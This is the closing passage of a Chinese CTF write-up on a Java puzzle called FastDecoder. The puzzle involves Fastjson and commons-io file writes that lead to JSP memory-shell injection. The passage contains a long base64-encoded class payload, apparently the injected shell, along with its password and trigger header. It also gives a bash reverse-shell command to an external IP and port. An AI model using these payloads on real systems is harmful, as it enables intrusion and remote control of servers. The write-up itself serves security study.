BkEtgBytgB2mQAGGQRNpwAETiywAAIACQBRAFQAGQBZAIoAjQAZAAEBCQAAAEgABf8AVAADBwACBwA8BwAEAAEHABn8AAAHAAT/ADQABQcAAgcAPAcABAcAYwcABAAA/wACAAQHAAIHADwHAAQHAAQAAQcAGQABCAAAAAoABAAoACoALAAuAAIAIAAdAAIBBwAAAMoABgAHAAAAergANLYAOEwBTSsqtgB6tgBAtgBcTacAY04qtgB8uACAuACEOgQSPBKGBr0AUlkDEohTWQSyAI5TWQWyAI5TtgCSOgUZBQS2AJgZBSsGvQAEWQMZBFNZBAO4AJxTWQUZBL64AJxTtgCgwABSOgYZBrYAXE2nAAU6BCywAAIACQAVABgAGQAZAHMAdgB4AAEBCQAAAC4AA/8AGAADBwACBwA8BwAEAAEHABn/AF0ABAcAAgcAPAcABAcAGQABBwB4+gABAQgAAAAEAAEAGQABACMAJAABAQcAAABWAAcABQAAADArEqIEvQBSWQMSEFMEvQAEWQMSpFO4AFdOLRKmuABhwACoOgQZBCy2AKxXpwAETrEAAQAAACsALgAZAAEBCQAAAAwAAm4HABn8AAAHAAQACAB9AH4AAgEHAAAAigAGAAQAAABqEq64ALFMKxKzBL0AUlkDEhBTtgC2K7YAXAS9AARZAypTtgCgwACIwACIsE0SuLgAsUwrEroDvQBStgC2AQO9AAS2AKBOLbYAchK8BL0AUlkDEhBTtgC2LQS9AARZAypTtgCgwACIwACIsAABAAAAKgArABkAAQEJAAAABgABawcAGQEIAAAACgAEACgALAAqAC4ACQCBAIIAAgEHAAAAbAAEAAYAAAA+uwC+WbcAv0y7AMFZKrcAxE27AMZZLLcAyU4RAQC8CDoELRkEtgDNWTYFmwAPKxkEAxUFtgDRp//rK7YA1bAAAAABAQkAAAAcAAL/ACEABQcAiAcAvgcAwQcAxgcAiAAA/AAXAQEIAAAABAABAA4AIADWANcAAgEHAAAAFwADAAQAAAALKyy4ANsrLbYA4LEAAAAAAQgAAAAEAAEAGQAIAF8ARAACAQcAAAAdAAIAAwAAABEqK7gA200sBLYA4SwqtgDlsAAAAAABCAAAAAQAAQAZAAgA2ADZAAIBBwAAAE8AAwAEAAAAKCq2AHJNLMYAGSwrtgDrTi0EtgDhLbBOLLYA7k2n/+m7AOdZK7cA778AAQAJABUAFgDnAAEBCQAAAA0AA/wABQcAUlAHAOcIAQgAAAAEAAEA5wAoAEMARAACAQcAAAAaAAQAAgAAAA4qKwO9AFIDvQAEuABXsAAAAAABCAAAAAgAAwAsAC4AKgApAEMAVQACAQcAAAEjAAMACQAAAMoqwQBSmQAKKsAAUqcAByq2AHI6BAE6BRkEOgYZBccAZBkGxgBfLMcAQxkGtgDzOgcDNggVCBkHvqIALhkHFQgytgD2K7YA+ZkAGRkHFQgytgD9vpoADRkHFQgyOgWnAAmECAGn/9CnAAwZBisstgCSOgWn/6k6BxkGtgDuOgan/50ZBccADLsALFkrtwD+vxkFBLYAmCrBAFKZABoZBQEttgCgsDoHuwEAWRkHtgEDtwEEvxkFKi22AKCwOge7AQBZGQe2AQO3AQS/AAMAJQByAHUALACcAKMApAAuALMAugC7AC4AAQEJAAAALwAODkMHAFL+AAgHAFIHAJQHAFL9ABcHAQYBLAX5AAIIQgcALAsNVAcALg5HBwAuAQgAAAAIAAMALAAqAC4AAA=="
}
基础信息:
密码: KjcpzZfSz
请求路径: /*
请求头: Accept: dRYssaHoY
脚本类型: JSP

成功注入:

img

注意事项

如果采用回显马,这里每次发送完请求后要重新生成,不然会因为重复加载相同类名报错。

反弹shell时,由于这里使用的是/bin/sh,所以命令要写成:

1
/bin/bash -c 'bash -i >& /dev/tcp/154.8.172.164/7777 0>&1'

去调用bash来识别 >&

参考

https://mp.weixin.qq.com/s/9e0V4bnV6fuGAfO1AKLYdw

https://mp.weixin.qq.com/s/3wBOOlcHN5cX8mqw7J-yXA

http://www.bmth666.cn/2025/12/30/Fastjson-commons-io%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99/

JavaPuzzle-FastDecoder
2026/02/18/JavaPuzzle-FastDecoder/
作者
1diot9
发布于
2026-02-18 14:28
许可
  1. 1. 前言
  2. 2. 分析
    1. 2.1. 读目录
    2. 2.2. 写文件
      1. 2.2.1. 写tomcat-docbase失败
      2. 2.2.2. ascii jar 写入
    3. 2.3. 注意事项
  3. 3. 参考
© 2025 - 2026    1diot9
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 125.5k 访客数 访问量
  1. 1. 前言
  2. 2. 分析
    1. 2.1. 读目录
    2. 2.2. 写文件
      1. 2.2.1. 写tomcat-docbase失败
      2. 2.2.2. ascii jar 写入
    3. 2.3. 注意事项
  3. 3. 参考